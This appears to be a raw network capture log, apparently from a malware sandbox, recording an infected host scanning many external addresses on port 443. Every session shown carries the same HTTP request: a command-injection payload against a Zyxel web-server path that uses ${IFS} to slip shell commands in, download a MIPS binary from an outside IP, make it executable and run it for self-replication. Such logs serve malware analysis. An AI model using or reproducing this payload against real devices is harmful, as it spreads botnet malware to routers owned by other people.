                                    Jan 13, 2024 19:02:28.039349079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2893192.168.2.1340648105.131.134.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039418936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2894192.168.2.1339064130.236.90.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039459944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2895192.168.2.1357210109.137.54.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039539099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2896192.168.2.1335112114.212.128.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039572954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2897192.168.2.135740893.143.124.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039674044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2898192.168.2.1345186161.49.224.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039716959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2899192.168.2.133712474.51.219.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039767981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2900192.168.2.134016845.0.152.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039829969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2901192.168.2.135246652.105.142.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039902925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2902192.168.2.1346248177.245.200.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039974928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2903192.168.2.1359562204.200.63.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040038109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2904192.168.2.133777083.105.183.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040087938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2905192.168.2.1340594140.247.137.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040141106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2906192.168.2.133909664.177.221.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040205956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2907192.168.2.1351582220.20.223.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040250063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2908192.168.2.1336560192.124.83.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040307045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2909192.168.2.1334074169.188.13.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040355921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2910192.168.2.1341884169.60.56.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040429115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2911192.168.2.133412832.179.162.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040489912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2912192.168.2.134856640.188.33.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040575981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2913192.168.2.1351608204.221.29.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040642977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2914192.168.2.135723247.60.138.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040698051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2915192.168.2.135629648.150.81.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040774107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2916192.168.2.1333748179.71.15.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040817022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2917192.168.2.135723669.170.200.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040880919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2918192.168.2.1344872101.181.52.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.040941000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2919192.168.2.1335644223.67.199.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041022062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2920192.168.2.134727025.162.50.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041049957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2921192.168.2.1349974151.2.135.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041109085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2922192.168.2.134736498.248.219.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041152954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2923192.168.2.13541421.196.182.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041220903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2924192.168.2.1334250125.43.50.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041309118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2925192.168.2.1354694102.190.65.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041374922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2926192.168.2.1341568192.213.201.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041403055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2927192.168.2.1355178122.193.50.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041491985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2928192.168.2.1347690106.133.107.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041549921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2929192.168.2.135568880.6.134.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041608095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2930192.168.2.13468662.5.242.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041647911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2931192.168.2.135818475.135.253.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041709900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2932192.168.2.1356824135.156.229.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041779041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2933192.168.2.1334280222.194.101.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041826963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2934192.168.2.134044686.114.65.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041904926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2935192.168.2.1335620194.13.140.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.041946888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2936192.168.2.133420417.62.22.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042020082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2937192.168.2.1348368119.142.219.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042058945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2938192.168.2.1342540116.198.230.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042129993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2939192.168.2.133587497.115.8.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042170048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2940192.168.2.1335762194.124.126.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042231083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2941192.168.2.13434768.141.130.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042267084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2942192.168.2.1336844116.96.42.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042367935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2943192.168.2.1333684159.73.40.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042439938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2944192.168.2.1333808184.50.173.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042495966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2945192.168.2.1351864160.195.86.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042557955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2946192.168.2.1347660205.70.230.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042613029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2947192.168.2.1342092202.252.113.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042675018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2948192.168.2.1358232146.75.173.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042732954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2949192.168.2.135094050.185.154.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042773008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2950192.168.2.1333820198.247.189.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042820930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2951192.168.2.134530870.237.95.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042870998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2952192.168.2.1345306173.135.149.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.042958975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2953192.168.2.135599095.110.195.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043004990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2954192.168.2.1335262145.227.45.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043049097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2955192.168.2.135816635.73.212.207443
                                    TimestampBytes transferredDirectionData
